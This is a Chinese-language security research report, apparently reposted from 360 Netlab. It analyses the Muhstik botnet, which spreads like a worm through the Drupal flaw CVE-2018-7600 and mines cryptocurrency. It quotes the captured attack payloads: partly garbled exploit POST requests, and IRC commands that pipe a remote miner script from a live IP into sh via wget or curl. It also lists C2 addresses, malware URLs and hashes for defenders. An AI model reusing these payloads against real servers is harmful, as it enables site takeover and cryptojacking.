僵尸网络 Muhstik 正在积极利用 Drupal 漏洞 CVE-2018-7600 蠕虫式传播

2018年3月28日，Drupal.org 公布了漏洞 CVE-2018-7600 的修复方案。Drapal 是一个开源的内容管理系统，由PHP语言写成，有很多网站使用 Drupal 向外提供网页服务。本次漏洞存在于 Drupal 的多个版本中，攻击者可以利用该漏洞完全控制网站。从2018年4月13日开始，360网络安全研究院观测到互联网上有大量针对该漏洞的扫描。通过分析，我们认为有至少3组恶意软件在利用该漏洞传播。其中一组恶意软件有蠕虫传播行为，感染量显著比其他的恶意软件更多。分析后，我们认为这是一个长期存在的僵尸网络家族。我们将其命名为 muhstik，这主要是因为其二进制文件名和通信协议中多处包含了这个字符串。我们认为 muhstik 有以下特点值得社区关注：

• 蠕虫式传播
• 长期存在
• 使用的漏洞利用数目众多
• 混合使用了多种牟利方式

攻击载荷

按照时间顺序，Muhstik使用了下面两组攻击载荷，这两组载荷占据了全部看到的载荷的80%左右，是我们看到的攻击的主要部分：

• #1 活跃时间：2018-04-14 03:33:06~ 2018-04-17 15:40:58
• #2 活跃时间：2018-04-16 19:38:39~至今

对应的攻击来源，其 IP 地址非常分散，而且基本都运行着 Drupal 程序。攻击来源自身是攻击载荷的易感染目标，这是蠕虫式传播的重要指标，引起了我们的警觉。两组攻击载荷的详细信息如下：

POST   /user/register?element_parents=account/mail/%23value Win64; x64)   Host: {target}   Content-Type: application/x-www-form-urlencoded   Content-length: 2048   form_id=user_register_form Win64; x64)   Host: {target}   Content-Type: application/x-www-form-urlencoded   Content-length: 170   form_id=user_register_form chmod +x /tmp/aiox86) > /dev/null 2> chmod +x /tmp/aioarm) > /dev/null 2> chmod +x /tmp/aiomipsel) > /dev/null 2> chmod +x /tmp/aiomips) > /dev/null 2> chmod +x /tmp/aioppc) > /dev/null 2> chmod +x /tmp/aioi586) > /dev/null 2>&1 & :TIMERS!tcl@localhost PRIVMSG #muhstik-i586 :!i* SH /tmp/aioi586 amazon > /dev/null 2>&1 & :TIMERS!tcl@localhost PRIVMSG #muhstik-i586 :!i* SH /tmp/aioi586 dedi > /dev/null 2>&1 & 

#muhstik-i586 #植入xmrig32挖矿程序

:TIMERS!tcl@localhost PRIVMSG #muhstik-i586 :!* SH wget -qO - http://104.236.26.43/xmrt32.sh | sh > /dev/null 2>&1 & :TIMERS!tcl@localhost PRIVMSG #muhstik-i586 :!* SH curl http://104.236.26.43/xmrt32.sh | sh > /dev/null 2>&1 & 

Muhstik 可能来源已久

通过对 Muhstik 相关域名的历史溯源，我们发现 Muhstik 由来已久，跟以下域名有较为强烈的关联关系。

dasan.deutschland-zahlung.eu   134.ip-51-254-219.eu   uranus.kei.su   wireless.kei.su   www.kei.su   y.fd6fq54s6df541q23sdxfg.eu   

IoC

Muhstik C2 List

139.99.101.96:9090    AS16276 OVH SAS   144.217.84.99:9090    AS16276 OVH SAS   145.239.84.0:9090    AS16276 OVH SAS   147.135.210.184:9090    AS16276 OVH SAS   142.44.163.168:9090    AS16276 OVH SAS   192.99.71.250:9090    AS16276 OVH SAS   142.44.240.14:9090    AS16276 OVH SAS   121.128.171.44:9090    AS4766 Korea Telecom    #当前未生效   66.70.190.236:9090    AS16276 OVH SAS #当前未生效   145.239.93.125:9090    AS16276 OVH SAS   irc.de-zahlung.eu:9090        #当前未生效   

Muhstik Malware URL

hxxp://51.254.221.129/c/cron   hxxp://51.254.221.129/c/tfti   hxxp://51.254.221.129/c/pftp   hxxp://51.254.221.129/c/ntpd   hxxp://51.254.221.129/c/sshd   hxxp://51.254.221.129/c/bash   hxxp://51.254.221.129/c/pty   hxxp://51.254.221.129/c/shy   hxxp://51.254.221.129/c/nsshtfti   hxxp://51.254.221.129/c/nsshcron   hxxp://51.254.221.129/c/nsshpftp   hxxp://51.254.221.129/c/fbsd   hxxp://191.238.234.227/x/aiox86   

Muhstik Malware MD5

c37016e34304ff4a2a0db1894cdcdb92     #Muhstik样本模块   da17dc1438bb039968a5737c6fbc88cd     #Muhstik扫描模块  

转载请注明来自网盾网络安全培训，本文标题：《僵尸网络 Muhstik 正在积极利用 Drupal 漏洞 CVE-2018-7600 蠕虫式传播》

标签：botnet